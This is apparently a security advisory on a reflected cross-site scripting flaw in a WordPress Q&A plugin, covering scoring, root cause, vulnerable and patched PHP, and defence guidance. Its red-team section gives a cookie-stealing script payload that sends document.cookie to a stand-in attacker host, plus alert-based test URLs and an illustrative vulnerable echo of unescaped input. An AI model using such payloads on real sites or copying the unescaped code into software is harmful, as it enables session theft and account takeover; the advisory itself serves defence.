CVE-2025-32646
Executive Summary
CVE-2025-32646 is a reflected Cross-Site Scripting (XSS) vulnerability in the PickPlugins Question Answer WordPress plugin, affecting versions up to and including 1.2.70. The vulnerability stems from improper neutralization of user-supplied input during web page generation, allowing an attacker to inject arbitrary JavaScript into a reflected response. This can lead to session hijacking, credential theft, or defacement within the context of the victim's browser session. The CVSS score is 7.1 (High), and while the EPSS score is currently 0.0%, the lack of a known patch increases the risk for unmaintained installations.

Supply Chain & Package Security
This vulnerability affects a WordPress plugin distributed via the official WordPress plugin repository. Users who installed the plugin directly from the WordPress dashboard or via manual upload are at risk. No official patch has been released by the vendor (PickPlugins), and the plugin may be abandoned. Organizations should treat this as a supply chain risk and consider removing or replacing the plugin.
CVSS Breakdown & Threat Level
- Attack Vector (AV): Network (N) – The vulnerability can be exploited remotely.
- Attack Complexity (AC): Low (L) – No special conditions are required.
- Privileges Required (PR): None (N) – No authentication needed.
- User Interaction (UI): Required (R) – The victim must click a crafted link.
- Scope (S): Changed (C) – The injected script can affect resources beyond the vulnerable component.
- Confidentiality (C): Low (L) – Limited data exposure possible.
- Integrity (I): Low (L) – Limited ability to modify content.
- Availability (A): Low (L) – Limited impact on availability.
Threat Level: High (7.1) – Exploitation is straightforward, and the impact can include session theft and phishing.
Deep Dive & Mechanics
The vulnerability exists in the question-answer plugin's handling of user input within the qa query parameter or similar GET parameters. The plugin fails to sanitize or escape the input before reflecting it in the HTML response. An attacker can craft a URL such as:
https://victim-site.com/?qa=<script>alert('XSS')</script>
When a logged-in administrator or user clicks this link, the injected script executes in their browser context. This can be used to steal cookies, perform actions on behalf of the user, or redirect to malicious sites.
The root cause is the use of echo $_GET['qa'] or similar unsanitized output without proper escaping functions like esc_html() or wp_kses().
Vulnerable vs. Patched Code
Vulnerable Code (example from plugin):
<?php
$qa = $_GET['qa'];
echo "<div class='qa-display'>$qa</div>";
?>
Patched Code (hypothetical fix):
<?php
$qa = isset($_GET['qa']) ? sanitize_text_field($_GET['qa']) : '';
echo "<div class='qa-display'>" . esc_html($qa) . "</div>";
?>
The patched version uses sanitize_text_field() to strip malicious content and esc_html() to encode HTML entities before output.
Exploitation & Lab Setup
Red Team (Offensive)
- Setup: Deploy a local WordPress instance with the vulnerable plugin (version 1.2.70).
- Craft Payload: Create a URL with a malicious script:
http://localhost/wordpress/?qa=<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script> - Deliver: Send the link to a victim via email or social engineering.
- Capture: Set up a listener on
attacker.comto receive stolen cookies.
Example exploit URL:
http://victim-site.com/?qa=%3Cscript%3Ealert(1)%3C/script%3E
Blue Team (Defensive)
- Monitor Logs: Check web server access logs for suspicious
qaparameter values containing<script>oronerrorattributes. - WAF Rules: Deploy a Web Application Firewall rule to block requests with
qaparameter containing HTML tags. - User Training: Educate users not to click on suspicious links.
Indicators of Compromise (IOCs)
- Network: HTTP requests with
qaparameter containing<script>,onerror,onload, orjavascript:. - Logs: Web server logs showing
GET /?qa=<script>...patterns. - File: Presence of unexpected JavaScript in the plugin's output directory (e.g.,
wp-content/plugins/question-answer/). - Cookie: Unusual cookie values or missing
HttpOnlyflags.

Remediation & Mitigation
- Immediate: Disable or remove the
question-answerplugin until a patch is available. - Workaround: Implement a Web Application Firewall (WAF) rule to block malicious
qaparameters. - Code Fix: If you maintain the plugin, apply input sanitization using
sanitize_text_field()and output escaping withesc_html(). - Monitoring: Enable logging for all
qaparameter requests and review for anomalies. - User Awareness: Train users to avoid clicking on untrusted links.
